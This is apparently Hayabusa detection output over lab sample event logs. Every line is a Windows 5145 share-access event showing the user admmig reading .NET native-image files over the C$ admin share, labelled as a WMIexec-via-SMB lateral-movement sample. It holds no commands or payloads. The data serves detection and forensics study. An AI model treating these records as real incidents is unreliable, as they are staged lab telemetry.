+2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wb9b5bb58#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wb9b5bb58#\789a3b275b1f5369ae5ab066e2461420  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wbc80354b#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wbc80354b#\fac59f632a5e8454549a214641d7bf25  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.269 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wc1cc6649#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.269 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wc1cc6649#\996a8c9071e330fe0cfac06c4d9f2378  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.269 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wca5f1176#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.269 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wca5f1176#\f8b6726fa5f43478af33a92559c0cef2  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.269 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wcffedcb4#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.269 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wcffedcb4#\f6be55d69bb92d49c71a4f9861c21451  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wd75d181a#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wd75d181a#\1a3848fefabdd8a28f5cae97106da369  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wd518ee0d#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wd518ee0d#\da3f8769af3163f94176c12ad223cb41  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.We9f24001#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.We9f24001#\6a6b3af569c21f51ab2982968ae2775d  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.We0722664#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.We0722664#\559ec1b9bc74181e3591df47bdb6b7ce  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.300 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wed3937f9#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.300 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wed3937f9#\4af7f054b14a220217737e71e6adff82  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.300 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wf493a5fb#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.300 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wf493a5fb#\1a4e8e027cdf1271603e7eba2cd8fab0  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.300 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\MIGUIControls  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.300 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\MIGUIControls\184c548bb9ea9e668823e3bedee4d86a  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\MMCEx  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\MMCEx\85a6f67f65de23064f7deded08a464c5  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\MMCFxCommon  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\MMCFxCommon\52b6052b9447848191f40e69c88f0f8b  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\MSBuild  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\MSBuild\2965d6f0cc081ef81005efec548f72a9  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\mscorlib  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\c90ef9a73ea0044641d31b19023aad61  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\napcrypt  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\napcrypt\2c945f157cd851b9dc43e99e9a89b34d  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\naphlpr  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\naphlpr\0ed1ed0e250773e63d7fe047dde76c81  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\napinit  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\napinit\1264f8bd57934a4941865b3c0512803e  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\napsnap  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\napsnap\5ab2511c5224a660e85286b3f2c2b752  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1c968d57#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1c968d57#\cc32e4d4e4dfbff56d3ae35134c1f38e  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.347 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1c9175f8#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.347 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1c9175f8#\6a2929eeb7b5fa6ff9ef1b0f4ff440f1  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.347 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1da2af67#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.347 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1da2af67#\efd939ad16f7521ac6c0c15afdcb2fa2  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.347 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio4b37ff64#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.363 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio4b37ff64#\8bb4776b03f3c369fd0c81c51cf468ac  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.363 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.363 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\92388fbe99436e6ed1f56ee56f10c565  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.363 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio49d6fefe#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.363 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio49d6fefe#\9bb6d55c49486153c1c1872929def220  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio53a7a42c#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio53a7a42c#\373b26e93f287f3cda45a6282a1de0d3  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio080b339b#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio080b339b#\9551a2df153a961cbbcb79bca937a833  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
